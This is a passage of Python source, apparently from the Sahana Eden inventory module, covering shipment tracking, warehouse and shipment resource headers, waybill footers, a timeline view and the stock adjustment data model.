rrtable = s3db.table("req_req")
if rrtable:
use_req = True
ritable = s3db.req_req_item
else:
# Req module deactivated
use_req = False
# If this item is linked to a request, then copy the req_ref to the send item
if use_req and record and record.req_item_id:
req_id = db(ritable.id == record.req_item_id).select(ritable.req_id,
limitby=(0, 1)
).first().req_id
req_ref = db(rrtable.id == req_id).select(rrtable.req_ref,
limitby=(0, 1)
).first().req_ref
db(stable.id == form_vars.send_id).update(req_ref = req_ref)
if form_vars.recv_id:
db(rtable.id == form_vars.recv_id).update(req_ref = req_ref)
# If the status is 'unloading':
# Move all the items into the site, update any request & make any adjustments
# Finally change the status to 'arrived'
if record and record.status == TRACK_STATUS_UNLOADING and \
record.recv_quantity:
# Look for the item in the site already
recv_rec = db(rtable.id == record.recv_id).select(rtable.site_id,
rtable.type,
).first()
recv_site_id = recv_rec.site_id
query = (inv_item_table.site_id == recv_site_id) & \
(inv_item_table.item_id == record.item_id) & \
(inv_item_table.item_pack_id == record.item_pack_id) & \
(inv_item_table.currency == record.currency) & \
(inv_item_table.status == record.inv_item_status) & \
(inv_item_table.pack_value == record.pack_value) & \
(inv_item_table.expiry_date == record.expiry_date) & \
(inv_item_table.bin == record.recv_bin) & \
(inv_item_table.owner_org_id == record.owner_org_id) & \
(inv_item_table.item_source_no == record.item_source_no) & \
(inv_item_table.status == record.inv_item_status) & \
(inv_item_table.supply_org_id == record.supply_org_id)
inv_item_row = db(query).select(inv_item_table.id,
limitby=(0, 1)).first()
if inv_item_row:
# Update the existing item
inv_item_id = inv_item_row.id
db(inv_item_table.id == inv_item_id).update(quantity = inv_item_table.quantity + record.recv_quantity)
else:
# Add a new item
source_type = 0
if form_vars.send_inv_item_id:
source_type = db(inv_item_table.id == form_vars.send_inv_item_id).select(inv_item_table.source_type,
limitby=(0, 1)
).first().source_type
else:
if recv_rec.type == 2:
source_type = 1 # Donation
else:
source_type = 2 # Procured
inv_item_id = inv_item_table.insert(site_id = recv_site_id,
item_id = record.item_id,
item_pack_id = record.item_pack_id,
currency = record.currency,
pack_value = record.pack_value,
expiry_date = record.expiry_date,
bin = record.recv_bin,
owner_org_id = record.owner_org_id,
supply_org_id = record.supply_org_id,
quantity = record.recv_quantity,
item_source_no = record.item_source_no,
source_type = source_type,
status = record.inv_item_status,
)
# If this item is linked to a request, then update the quantity fulfil
if use_req and record.req_item_id:
req_item = db(ritable.id == record.req_item_id).select(ritable.quantity_fulfil,
ritable.item_pack_id,
limitby=(0, 1)
).first()
req_quantity = req_item.quantity_fulfil
req_pack_quantity = db(siptable.id == req_item.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
track_pack_quantity = db(siptable.id == record.item_pack_id).select(siptable.quantity,
limitby=(0, 1)
).first().quantity
quantity_fulfil = supply_item_add(req_quantity,
req_pack_quantity,
record.recv_quantity,
track_pack_quantity
)
db(ritable.id == record.req_item_id).update(quantity_fulfil = quantity_fulfil)
s3db.req_update_status(req_id)
db(tracktable.id == id).update(recv_inv_item_id = inv_item_id,
status = TRACK_STATUS_ARRIVED)
# If the receive quantity doesn't equal the sent quantity
# then an adjustment needs to be set up
if record.quantity != record.recv_quantity:
# Do we have an adjustment record?
# (which might have be created for another item in this shipment)
query = (tracktable.recv_id == record.recv_id) & \
(tracktable.adj_item_id != None)
adj_rec = db(query).select(tracktable.adj_item_id,
limitby = (0, 1)).first()
adjitemtable = s3db.inv_adj_item
if adj_rec:
adj_id = db(adjitemtable.id == adj_rec.adj_item_id).select(adjitemtable.adj_id,
limitby=(0, 1)
).first().adj_id
# If we don't yet have an adj record then create it
else:
adjtable = s3db.inv_adj
irtable = s3db.inv_recv
recv_rec = db(irtable.id == record.recv_id).select(irtable.recipient_id,
irtable.site_id,
irtable.comments,
limitby=(0, 1)).first()
adj_id = adjtable.insert(adjuster_id = recv_rec.recipient_id,
site_id = recv_rec.site_id,
adjustment_date = current.request.now.date(),
category = 0,
status = 1,
comments = recv_rec.comments,
)
# Now create the adj item record
adj_item_id = adjitemtable.insert(reason = 0,
adj_id = adj_id,
inv_item_id = record.send_inv_item_id, # original source inv_item
item_id = record.item_id, # the supply item
item_pack_id = record.item_pack_id,
old_quantity = record.quantity,
new_quantity = record.recv_quantity,
currency = record.currency,
old_pack_value = record.pack_value,
new_pack_value = record.pack_value,
expiry_date = record.expiry_date,
bin = record.recv_bin,
comments = record.comments,
)
# Copy the adj_item_id to the tracking record
db(tracktable.id == id).update(adj_item_id = adj_item_id)
# -------------------------------------------------------------------------
@staticmethod
def inv_track_item_deleting(id):
"""
            A track item can only be deleted if the status is Preparing.
            When a track item record is deleted and it is linked to an inv_item
            then the quantity is returned to that inventory item.
"""
db = current.db
s3db = current.s3db
tracktable = db.inv_track_item
inv_item_table = db.inv_inv_item
ritable = s3db.req_req_item
siptable = db.supply_item_pack
record = tracktable[id]
if record.status != 1:
return False
# if this is linked to a request
# then remove these items from the quantity in transit
if record.req_item_id:
req_id = record.req_item_id
req_item = ritable[req_id]
req_quantity = req_item.quantity_transit
req_pack_quantity = siptable[req_item.item_pack_id].quantity
track_pack_quantity = siptable[record.item_pack_id].quantity
quantity_transit = s3db.supply_item_add(req_quantity,
req_pack_quantity,
- record.quantity,
track_pack_quantity
)
db(ritable.id == req_id).update(quantity_transit = quantity_transit)
s3db.req_update_status(req_id)
# Check that we have a link to a warehouse
if record.send_inv_item_id:
trackTotal = record.quantity
# Remove the total from this record and place it back in the warehouse
db(inv_item_table.id == record.send_inv_item_id).update(quantity = inv_item_table.quantity + trackTotal)
            db(tracktable.id == id).update(quantity = 0,
                                           comments = "%s Quantity was: %s" % (record.comments or "", trackTotal))
return True
# -------------------------------------------------------------------------
@staticmethod
def inv_timeline(r, **attr):
"""
Display the Incidents on a Simile Timeline
http://www.simile-widgets.org/wiki/Reference_Documentation_for_Timeline
@ToDo: Play button
http://www.simile-widgets.org/wiki/Timeline_Moving_the_Timeline_via_Javascript
"""
if r.representation == "html" and (r.name == "recv" or \
r.name == "send"):
T = current.T
request = current.request
response = current.response
s3 = response.s3
# Add core Simile Code
s3.scripts.append("/%s/static/scripts/simile/timeline/timeline-api.js" % request.application)
# Add our controlled script
if s3.debug:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.js" % request.application)
else:
s3.scripts.append("/%s/static/scripts/S3/s3.timeline.min.js" % request.application)
# Add our data
# @ToDo: Make this the initial data & then collect extra via REST with a stylesheet
# add in JS using S3.timeline.eventSource.addMany(events) where events is a []
db = current.db
rows1 = db(db.inv_send.id > 0).select() # select rows from inv_send
            rows2 = db(db.inv_recv.id > 0).select() # select rows from inv_recv
if r.record:
# Single record
rows = [r.record]
else:
# Multiple records
# @ToDo: Load all records & sort to closest in time
# http://stackoverflow.com/questions/7327689/how-to-generate-a-sequence-of-future-datetimes-in-python-and-determine-nearest-d
r.resource.load(limit=2000)
rows = r.resource._rows
data = {"dateTimeFormat": "iso8601",
}
now = request.utcnow
tl_start = tl_end = now
events = []
            if r.name == "send":
rr = (rows, rows2)
else:
rr = (rows1, rows)
            for (row_send, row_recv) in itertools.izip_longest(rr[0], rr[1]):
                # Send dates
                start = row_send.date if row_send and row_send.date else ""
                if start:
                    if start < tl_start:
                        tl_start = start
                    if start > tl_end:
                        tl_end = start
                    start = start.isoformat()
                # Recv date
                end = row_recv.date if row_recv and row_recv.date else ""
                if end:
                    if end > tl_end:
                        tl_end = end
                    end = end.isoformat()
# append events
events.append({"start": start,
"end": end,
#"title": row.name,
#"caption": row.comments or "",
#"description": row.comments or "",
# @ToDo: Colour based on Category (More generically: Resource or Resource Type)
# "color" : "blue",
})
data["events"] = events
data = json.dumps(data, separators=SEPARATORS)
code = "".join((
'''S3.timeline.data=''', data, '''
S3.timeline.tl_start="''', tl_start.isoformat(), '''"
S3.timeline.tl_end="''', tl_end.isoformat(), '''"
S3.timeline.now="''', now.isoformat(), '''"
'''))
# Control our code in static/scripts/S3/s3.timeline.js
s3.js_global.append(code)
# Create the DIV
item = DIV(_id="s3timeline", _class="s3-timeline")
output = dict(item = item)
# Maintain RHeader for consistency
if "rheader" in attr:
rheader = attr["rheader"](r)
if rheader:
output["rheader"] = rheader
output["title"] = T("Incident Timeline")
response.view = "timeline.html"
return output
else:
raise HTTP(501, "bad method")
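        # The JS injected above gives s3.timeline.js data of roughly this shape
        # (dates shown are hypothetical):
        #   S3.timeline.data = {"dateTimeFormat": "iso8601",
        #                       "events": [{"start": "2014-03-01T10:00:00",
        #                                   "end": "2014-03-04T16:30:00"}]}
        #   S3.timeline.tl_start = "2014-03-01T10:00:00"
        #   S3.timeline.tl_end = "2014-03-04T16:30:00"
        #   S3.timeline.now = "2014-03-05T09:00:00"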
# =============================================================================
def inv_tabs(r):
"""
Add an expandable set of Tabs for a Site's Inventory Tasks
@ToDo: Make these Expand/Contract without a server-side call
"""
settings = current.deployment_settings
if settings.get_org_site_inv_req_tabs():
if settings.has_module("inv") and \
current.auth.s3_has_permission("read", "inv_inv_item", c="inv"):
T = current.T
s3 = current.session.s3
collapse_tabs = settings.get_inv_collapse_tabs()
tablename = s3_rheader_resource(r)[0]
if collapse_tabs and not (tablename == "inv_warehouse"):
# Test if the tabs are collapsed
show_collapse = True
show_inv = r.get_vars.show_inv
if show_inv == "True":
show_inv = True
elif show_inv == "False":
show_inv = False
else:
show_inv = None
if show_inv == True or show_inv == False:
if not s3.show_inv:
s3.show_inv = Storage()
s3.show_inv["%s_%s" % (r.name, r.id)] = show_inv
elif s3.show_inv:
show_inv = s3.show_inv.get("%s_%s" % (r.name, r.id))
else:
show_inv = False
else:
show_inv = True
show_collapse = False
if show_inv:
if settings.get_inv_shipment_name() == "order":
recv_tab = T("Orders")
else:
recv_tab = T("Receive")
inv_tabs = [(T("Stock"), "inv_item"),
#(T("Incoming"), "incoming/"),
(recv_tab, "recv"),
(T("Send"), "send"),
]
if settings.has_module("proc"):
inv_tabs.append((T("Planned Procurements"), "plan"))
if show_collapse:
inv_tabs.append(("- %s" % T("Warehouse"),
None, dict(show_inv="False")))
else:
inv_tabs = [("+ %s" % T("Warehouse"), "inv_item",
dict(show_inv="True"))]
return inv_tabs
return []
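# When the inventory tabs are shown expanded, the list returned above looks
# roughly like (labels subject to deployment settings):
#   [(T("Stock"), "inv_item"),
#    (T("Receive"), "recv"),
#    (T("Send"), "send"),
#    ("- Warehouse", None, {"show_inv": "False"})]
# and when collapsed, just:
#   [("+ Warehouse", "inv_item", {"show_inv": "True"})]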
# =============================================================================
def inv_rheader(r):
""" Resource Header for Warehouses and Inventory Items """
if r.representation != "html" or r.method == "import":
# RHeaders only used in interactive views
return None
# Need to use this format as otherwise req_match?viewing=org_office.x
# doesn't have an rheader
tablename, record = s3_rheader_resource(r)
if not record:
# List or Create form: rheader makes no sense here
return None
T = current.T
s3db = current.s3db
table = s3db.table(tablename)
rheader = None
if tablename == "inv_warehouse":
# Tabs
tabs = [(T("Basic Details"), None),
#(T("Contact Data"), "contact"),
]
settings = current.deployment_settings
if settings.has_module("hrm"):
STAFF = settings.get_hrm_staff_label()
tabs.append((STAFF, "human_resource"))
permit = current.auth.s3_has_permission
if permit("create", "hrm_human_resource_site") and \
permit("update", tablename, r.id):
tabs.append((T("Assign %(staff)s") % dict(staff=STAFF), "assign"))
if settings.has_module("asset"):
tabs.insert(6,(T("Assets"), "asset"))
tabs = tabs + s3db.inv_tabs(r)
if settings.has_module("req"):
tabs = tabs + s3db.req_tabs(r)
tabs.append((T("Attachments"), "document"))
tabs.append((T("User Roles"), "roles"))
# Fields
rheader_fields = [["name", "organisation_id", "email"],
["location_id", "phone1"],
]
rheader = S3ResourceHeader(rheader_fields, tabs)
rheader_fields, rheader_tabs = rheader(r, table=table, record=record)
# Inject logo
logo = s3db.org_organisation_logo(record.organisation_id)
if logo:
rheader = DIV(TABLE(TR(TD(logo),TD(rheader_fields))))
else:
rheader = DIV(rheader_fields)
rheader.append(rheader_tabs)
elif tablename == "inv_inv_item":
# Tabs
tabs = [(T("Details"), None),
(T("Track Shipment"), "track_movement/"),
]
rheader_tabs = DIV(s3_rheader_tabs(r, tabs))
# Header
rheader = DIV(
TABLE(
TR(TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id),
TH("%s: " % table.item_pack_id.label),
table.item_pack_id.represent(record.item_pack_id),
),
TR(TH("%s: " % table.site_id.label),
TD(table.site_id.represent(record.site_id),
_colspan=3),
),
), rheader_tabs)
elif tablename == "inv_track_item":
# Tabs
tabs = [(T("Details"), None),
(T("Track Shipment"), "inv_item/"),
]
rheader_tabs = DIV(s3_rheader_tabs(r, tabs))
# Get site data
table = s3db.inv_inv_item
irecord = current.db(table.id == record.send_inv_item_id).select(
table.site_id,
limitby=(0, 1)).first()
# Header
if irecord:
rheader = DIV(
TABLE(
TR(TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id),
TH("%s: " % table.item_pack_id.label),
table.item_pack_id.represent(record.item_pack_id),
),
TR(TH( "%s: " % table.site_id.label),
TD(table.site_id.represent(irecord.site_id),
_colspan=3),
),
), rheader_tabs)
else:
rheader = DIV(
TABLE(
TR(TH("%s: " % table.item_id.label),
table.item_id.represent(record.item_id),
TH("%s: " % table.item_pack_id.label),
table.item_pack_id.represent(record.item_pack_id),
),
), rheader_tabs)
# Build footer
inv_rfooter(r, record)
return rheader
# =============================================================================
def inv_rfooter(r, record):
""" Resource Footer for Warehouses and Inventory Items """
if "site_id" not in record:
return
if (r.component and r.component.name == "inv_item"):
T = current.T
rfooter = TAG[""]()
component_id = r.component_id
if not current.deployment_settings.get_inv_direct_stock_edits() and \
current.auth.s3_has_permission("update", "inv_warehouse", r.id):
if component_id:
asi_btn = A(T("Adjust Stock Item"),
_href = URL(c = "inv",
f = "adj",
args = ["create"],
vars = {"site": record.site_id,
"item": component_id},
),
_class = "action-btn"
)
rfooter.append(asi_btn)
else:
as_btn = A(T("Adjust Stock"),
_href = URL(c = "inv",
f = "adj",
args = ["create"],
vars = {"site": record.site_id},
),
_class = "action-btn"
)
rfooter.append(as_btn)
if component_id:
ts_btn = A(T("Track Shipment"),
_href = URL(c = "inv",
f = "track_movement",
vars = {"viewing": "inv_item.%s" % component_id},
),
_class = "action-btn"
)
rfooter.append(ts_btn)
current.response.s3.rfooter = rfooter
# =============================================================================
def inv_recv_crud_strings():
"""
CRUD Strings for inv_recv which need to be visible to menus without a
model load
"""
T = current.T
if current.deployment_settings.get_inv_shipment_name() == "order":
#recv_id_label = T("Order")
ADD_RECV = T("Add Order")
current.response.s3.crud_strings["inv_recv"] = Storage(
label_create = ADD_RECV,
title_display = T("Order Details"),
title_list = T("Orders"),
title_update = T("Edit Order"),
label_list_button = T("List Orders"),
label_delete_button = T("Delete Order"),
msg_record_created = T("Order Created"),
msg_record_modified = T("Order updated"),
msg_record_deleted = T("Order canceled"),
msg_list_empty = T("No Orders registered")
)
else:
#recv_id_label = T("Receive Shipment")
ADD_RECV = T("Receive New Shipment")
current.response.s3.crud_strings["inv_recv"] = Storage(
label_create = ADD_RECV,
title_display = T("Received Shipment Details"),
title_list = T("Received/Incoming Shipments"),
title_update = T("Shipment to Receive"),
label_list_button = T("List Received/Incoming Shipments"),
label_delete_button = T("Delete Received Shipment"),
msg_record_created = T("Shipment Created"),
msg_record_modified = T("Received Shipment updated"),
msg_record_deleted = T("Received Shipment canceled"),
msg_list_empty = T("No Received Shipments")
)
return
# =============================================================================
def inv_send_rheader(r):
""" Resource Header for Send """
if r.representation == "html" and r.name == "send":
record = r.record
if record:
            db = current.db
            s3db = current.s3db
            T = current.T
            s3 = current.response.s3
            settings = current.deployment_settings
tabs = [(T("Edit Details"), None),
(T("Items"), "track_item"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
stable = s3db.org_site
send_id = record.id
status = record.status
site_id = record.site_id
if site_id:
site = db(stable.site_id == site_id).select(stable.organisation_id,
stable.instance_type,
limitby=(0, 1)
).first()
org_id = site.organisation_id
logo = s3db.org_organisation_logo(org_id) or ""
instance_table = s3db[site.instance_type]
if "phone1" in instance_table.fields:
site = db(instance_table.site_id == site_id).select(instance_table.phone1,
instance_table.phone2,
limitby=(0, 1)
).first()
phone1 = site.phone1
phone2 = site.phone2
else:
phone1 = None
phone2 = None
else:
org_id = None
logo = ""
phone1 = None
phone2 = None
to_site_id = record.to_site_id
if to_site_id:
site = db(stable.site_id == to_site_id).select(stable.location_id,
limitby=(0, 1)
).first()
address = s3db.gis_LocationRepresent(address_only=True)(site.location_id)
else:
address = current.messages["NONE"]
rData = TABLE(TR(TD(T(settings.get_inv_send_form_name().upper()),
_colspan=2, _class="pdf_title"),
TD(logo, _colspan=2),
),
TR(TH("%s: " % table.status.label),
table.status.represent(status),
),
TR(TH("%s: " % table.send_ref.label),
TD(table.send_ref.represent(record.send_ref)),
TH("%s: " % table.req_ref.label),
TD(table.req_ref.represent(record.req_ref)),
),
TR(TH("%s: " % table.date.label),
table.date.represent(record.date),
TH("%s: " % table.delivery_date.label),
table.delivery_date.represent(record.delivery_date),
),
TR(TH("%s: " % table.to_site_id.label),
table.to_site_id.represent(record.to_site_id),
TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
),
TR(TH("%s: " % T("Address")),
TD(address, _colspan=3),
),
TR(TH("%s: " % table.transported_by.label),
table.transported_by.represent(record.transported_by),
TH("%s: " % table.transport_ref.label),
table.transport_ref.represent(record.transport_ref),
),
TR(TH("%s: " % table.sender_id.label),
table.sender_id.represent(record.sender_id),
TH("%s: " % table.recipient_id.label),
table.recipient_id.represent(record.recipient_id),
),
TR(TH("%s: " % T("Complete? Please call")),
phone1 or "",
TH("%s: " % T("Problems? Please call")),
phone2 or phone1 or "",
),
TR(TH("%s: " % table.comments.label),
TD(record.comments or "", _colspan=3)
)
)
# Find out how many inv_track_items we have for this send record
tracktable = s3db.inv_track_item
query = (tracktable.send_id == send_id) & \
(tracktable.deleted == False)
#cnt = db(query).count()
cnt = db(query).select(tracktable.id, limitby=(0, 1)).first()
if cnt:
cnt = 1
else:
cnt = 0
action = DIV()
#rSubdata = TABLE()
rfooter = TAG[""]()
if status == SHIP_STATUS_IN_PROCESS:
if current.auth.s3_has_permission("update",
"inv_send",
record_id=record.id):
if cnt > 0:
action.append(A(T("Send Shipment"),
_href = URL(f = "send_process",
args = [record.id]
),
_id = "send_process",
_class = "action-btn"
)
)
s3.jquery_ready.append('''S3.confirmClick("#send_process","%s")''' \
% T("Do you want to send this shipment?"))
#if not r.component and not r.method == "form":
# ritable = s3db.req_req_item
# rcitable = s3db.req_commit_item
# query = (tracktable.send_id == record.id) & \
# (rcitable.req_item_id == tracktable.req_item_id) & \
# (tracktable.req_item_id == ritable.id) & \
# (tracktable.deleted == False)
# records = db(query).select()
# for record in records:
# rSubdata.append(TR(TH("%s: " % ritable.item_id.label),
# ritable.item_id.represent(record.req_req_item.item_id),
# TH("%s: " % rcitable.quantity.label),
# record.req_commit_item.quantity,
# ))
elif status == SHIP_STATUS_RETURNING:
if cnt > 0:
action.append(A(T("Complete Returns"),
_href = URL(c = "inv",
f = "return_process",
args = [record.id]
),
_id = "return_process",
_class = "action-btn"
)
)
s3.jquery_ready.append('''S3.confirmClick("#return_process","%s")''' \
% T("Do you want to complete the return process?") )
else:
msg = T("You need to check all item quantities before you can complete the return process")
rfooter.append(SPAN(msg))
elif status != SHIP_STATUS_CANCEL:
if status == SHIP_STATUS_SENT:
jappend = s3.jquery_ready.append
s3_has_permission = current.auth.s3_has_permission
if s3_has_permission("update",
"inv_send",
record_id=record.id):
action.append(A(T("Manage Returns"),
_href = URL(c = "inv",
f = "send_returns",
args = [record.id],
vars = None,
),
_id = "send_return",
_class = "action-btn",
_title = T("Only use this button to accept back into stock some items that were returned from a delivery to beneficiaries who do not record the shipment details directly into the system")
)
)
jappend('''S3.confirmClick("#send_return","%s")''' \
% T("Confirm that some items were returned from a delivery to beneficiaries and they will be accepted back into stock."))
action.append(A(T("Confirm Shipment Received"),
_href = URL(f = "send",
args = [record.id],
vars = {"received": 1},
),
_id = "send_receive",
_class = "action-btn",
_title = T("Only use this button to confirm that the shipment has been received by a destination which will not record the shipment directly into the system")
)
)
jappend('''S3.confirmClick("#send_receive","%s")''' \
% T("Confirm that the shipment has been received by a destination which will not record the shipment directly into the system and confirmed as received.") )
if s3_has_permission("delete",
"inv_send",
record_id=record.id):
action.append(A(T("Cancel Shipment"),
_href = URL(c = "inv",
f = "send_cancel",
args = [record.id]
),
_id = "send_cancel",
_class = "action-btn"
)
)
jappend('''S3.confirmClick("#send_cancel","%s")''' \
% T("Do you want to cancel this sent shipment? The items will be returned to the Warehouse. This action CANNOT be undone!") )
if not r.method == "form":
# msg = ""
# if cnt == 1:
# msg = T("One item is attached to this shipment")
# elif cnt > 1:
# msg = T("%s items are attached to this shipment") % cnt
# rData.append(TR(TH(action, _colspan=2),
# TD(msg)))
rData.append(TR(TH(action, _colspan=2)))
s3.rfooter = rfooter
rheader = DIV(rData,
rheader_tabs,
#rSubdata
)
return rheader
return None
# ---------------------------------------------------------------------
def inv_send_pdf_footer(r):
"""
Footer for the Waybill
"""
if r.record:
T = current.T
footer = DIV(TABLE(TR(TH(T("Commodities Loaded")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature")),
TH(T("Location (Site)")),
TH(T("Condition")),
),
TR(TD(T("Loaded By")),
TD(),
TD(),
TD(),
TD(),
TD(),
TD(),
),
TR(TD(T("Transported By")),
TD(),
TD(),
TD(),
TD(),
TD(),
TD(),
),
TR(TH(T("Reception")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature")),
TH(T("Location (Site)")),
TH(T("Condition")),
),
TR(TD(T("Received By")),
TD(),
TD(),
TD(),
TD(),
TD(),
TD(),
),
))
return footer
return None
# =============================================================================
def inv_recv_rheader(r):
""" Resource Header for Receiving """
if r.representation == "html" and r.name == "recv":
record = r.record
if record:
T = current.T
s3db = current.s3db
tabs = [(T("Edit Details"), None),
(T("Items"), "track_item"),
]
rheader_tabs = s3_rheader_tabs(r, tabs)
table = r.table
tracktable = s3db.inv_track_item
recv_id = record.id
site_id = record.site_id
org_id = s3db.org_site[site_id].organisation_id
logo = s3db.org_organisation_logo(org_id)
rData = TABLE(TR(TD(T(current.deployment_settings.get_inv_recv_form_name()),
_colspan=2, _class="pdf_title"),
TD(logo, _colspan=2),
),
TR(TH("%s: " % table.recv_ref.label),
TD(table.recv_ref.represent(record.recv_ref))
),
TR(TH("%s: " % table.status.label),
table.status.represent(record.status),
),
TR(TH("%s: " % table.eta.label),
table.eta.represent(record.eta),
TH("%s: " % table.date.label),
table.date.represent(record.date),
),
TR(TH("%s: " % table.from_site_id.label),
table.from_site_id.represent(record.from_site_id),
TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
),
TR(TH("%s: " % table.sender_id.label),
s3_fullname(record.sender_id),
TH("%s: " % table.recipient_id.label),
s3_fullname(record.recipient_id),
),
TR(TH("%s: " % table.send_ref.label),
table.send_ref.represent(record.send_ref),
TH("%s: " % table.recv_ref.label),
table.recv_ref.represent(record.recv_ref),
),
TR(TH("%s: " % table.comments.label),
TD(record.comments or "", _colspan=3),
),
)
rfooter = TAG[""]()
action = DIV()
# Find out how many inv_track_items we have for this recv record
query = (tracktable.recv_id == recv_id) & \
(tracktable.deleted == False)
cnt = current.db(query).count()
if record.status == SHIP_STATUS_SENT or \
record.status == SHIP_STATUS_IN_PROCESS:
if current.auth.s3_has_permission("update",
"inv_recv",
record_id=record.id):
if cnt > 0:
action.append(A(T("Receive Shipment"),
_href = URL(c = "inv",
f = "recv_process",
args = [record.id]
),
_id = "recv_process",
_class = "action-btn"
))
recv_btn_confirm = SCRIPT("S3.confirmClick('#recv_process', '%s')"
% T("Do you want to receive this shipment?") )
rfooter.append(recv_btn_confirm)
else:
msg = T("You need to check all item quantities and allocate to bins before you can receive the shipment")
rfooter.append(SPAN(msg))
# FB: Removed as serves no useful purpose & AusRC complained about it
#else:
# if record.status == SHIP_STATUS_RECEIVED:
# if current.auth.s3_has_permission("delete",
# "inv_recv",
# record_id=record.id):
# action.append(A(T("Cancel Shipment"),
# _href = URL(c = "inv",
# f = "recv_cancel",
# args = [record.id]
# ),
# _id = "recv_cancel",
# _class = "action-btn"
# ))
# cancel_btn_confirm = SCRIPT("S3.confirmClick('#recv_cancel', '%s')"
# % T("Do you want to cancel this received shipment? The items will be removed from the Warehouse. This action CANNOT be undone!") )
# rfooter.append(cancel_btn_confirm)
msg = ""
if cnt == 1:
msg = T("This shipment contains one line item")
elif cnt > 1:
msg = T("This shipment contains %s items") % cnt
rData.append(TR(TH(action,
_colspan=2),
TD(msg)
))
current.response.s3.rfooter = rfooter
rheader = DIV(rData,
rheader_tabs,
)
return rheader
return None
# ---------------------------------------------------------------------
def inv_recv_pdf_footer(r):
"""
"""
record = r.record
if record:
T = current.T
footer = DIV(TABLE(TR(TH(T("Delivered By")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature")),
),
TR(TD(),
TD(),
TD(),
TD(),
TD(),
),
TR(TH(T("Received By")),
TH(T("Date")),
TH(T("Function")),
TH(T("Name")),
TH(T("Signature / Stamp")),
),
TR(TD(),
TD(),
TD(),
TD(),
TD(),
),
))
return footer
return None
# =============================================================================
class S3InventoryAdjustModel(S3Model):
"""
        A module to manage Adjustments to Inventory stock levels
        - Stock Counts / Adjustments
        - Adjustment Items (revised quantities, values and ownership)
"""
names = ("inv_adj",
"inv_adj_item",
"inv_adj_item_id",
)
def model(self):
T = current.T
db = current.db
auth = current.auth
settings = current.deployment_settings
track_pack_values = settings.get_inv_track_pack_values()
organisation_id = self.org_organisation_id
org_site_represent = self.org_site_represent
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Adjustments
#
adjust_type = {0 : T("Shipment"),
1 : T("Inventory"),
}
adjust_status = {0 : T("In Process"),
1 : T("Complete"),
}
tablename = "inv_adj"
define_table(tablename,
self.super_link("doc_id", "doc_entity"),
self.pr_person_id(name = "adjuster_id",
label = T("Actioning officer"),
ondelete = "RESTRICT",
default = auth.s3_logged_in_person(),
comment = self.pr_person_comment(child="adjuster_id")
),
# This is a reference, not a super-link, so we can override
Field("site_id", self.org_site,
label = current.deployment_settings.get_inv_facility_label(),
ondelete = "SET NULL",
default = auth.user.site_id if auth.is_logged_in() else None,
requires = IS_ONE_OF(db, "org_site.site_id",
lambda id, row: \
org_site_represent(id, row,
show_link=False),
instance_types = auth.org_site_types,
updateable = True,
sort = True,
),
represent=org_site_represent),
s3_date("adjustment_date",
default = "now",
writable = False
),
Field("status", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(adjust_status)),
represent = lambda opt: \
adjust_status.get(opt, UNKNOWN_OPT),
default = 0,
label = T("Status"),
writable = False
),
Field("category", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(adjust_type)),
represent = lambda opt: \
adjust_type.get(opt, UNKNOWN_OPT),
default = 1,
label = T("Type"),
writable = False,
),
s3_comments(),
*s3_meta_fields())
self.configure(tablename,
super_entity = "doc_entity",
onaccept = self.inv_adj_onaccept,
create_next = URL(args=["[id]", "adj_item"]),
)
# Components
self.add_components(tablename,
inv_adj_item = "adj_id",
)
# Reusable Field
adj_id = S3ReusableField("adj_id", "reference %s" % tablename,
label = T("Inventory Adjustment"),
ondelete = "RESTRICT",
represent = self.inv_adj_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_adj.id",
self.inv_adj_represent,
orderby="inv_adj.adjustment_date",
sort=True)),
sortby = "date",
)
adjust_reason = {0 : T("Unknown"),
1 : T("None"),
2 : T("Lost"),
3 : T("Damaged"),
4 : T("Expired"),
5 : T("Found"),
6 : T("Transfer Ownership"),
7 : T("Issued without Record"),
7 : T("Distributed without Record"),
}
# CRUD strings
if settings.get_inv_stock_count():
ADJUST_STOCK = T("New Stock Count")
crud_strings["inv_adj"] = Storage(
label_create = ADJUST_STOCK,
title_display = T("Stock Count Details"),
title_list = T("Stock Counts"),
title_update = T("Edit Stock Count"),
label_list_button = T("List Stock Counts"),
label_delete_button = T("Delete Stock Count"),
msg_record_created = T("Stock Count created"),
msg_record_modified = T("Stock Count modified"),
msg_record_deleted = T("Stock Count deleted"),
msg_list_empty = T("No stock counts have been done"))
else:
ADJUST_STOCK = T("New Stock Adjustment")
crud_strings["inv_adj"] = Storage(
label_create = ADJUST_STOCK,
title_display = T("Stock Adjustment Details"),
title_list = T("Stock Adjustments"),
title_update = T("Edit Adjustment"),
label_list_button = T("List Stock Adjustments"),
label_delete_button = T("Delete Stock Adjustment"),
msg_record_created = T("Adjustment created"),
msg_record_modified = T("Adjustment modified"),
msg_record_deleted = T("Adjustment deleted"),
msg_list_empty = T("No stock adjustments have been done"))
# ---------------------------------------------------------------------
# Adjustment Items
#
inv_item_status_opts = self.inv_item_status_opts
tablename = "inv_adj_item"
define_table(tablename,
# Original inventory item
self.inv_item_id(ondelete = "RESTRICT",
readable = False,
writable = False),
self.supply_item_id(
ondelete = "RESTRICT"
),
self.supply_item_pack_id(
ondelete = "SET NULL"
),
Field("old_quantity", "double", notnull=True,
label = T("Original Quantity"),
default = 0,
writable = False),
Field("new_quantity", "double",
label = T("Revised Quantity"),
represent = self.qnty_adj_repr,
requires = IS_NOT_EMPTY(),
),
Field("reason", "integer",
label = T("Reason"),
requires = IS_IN_SET(adjust_reason),
default = 1,
represent = lambda opt: \
adjust_reason.get(opt, UNKNOWN_OPT),
writable = False),
Field("old_pack_value", "double",
readable = track_pack_values,
writable = track_pack_values,
label = T("Original Value per Pack")),
Field("new_pack_value", "double",
readable = track_pack_values,
writable = track_pack_values,
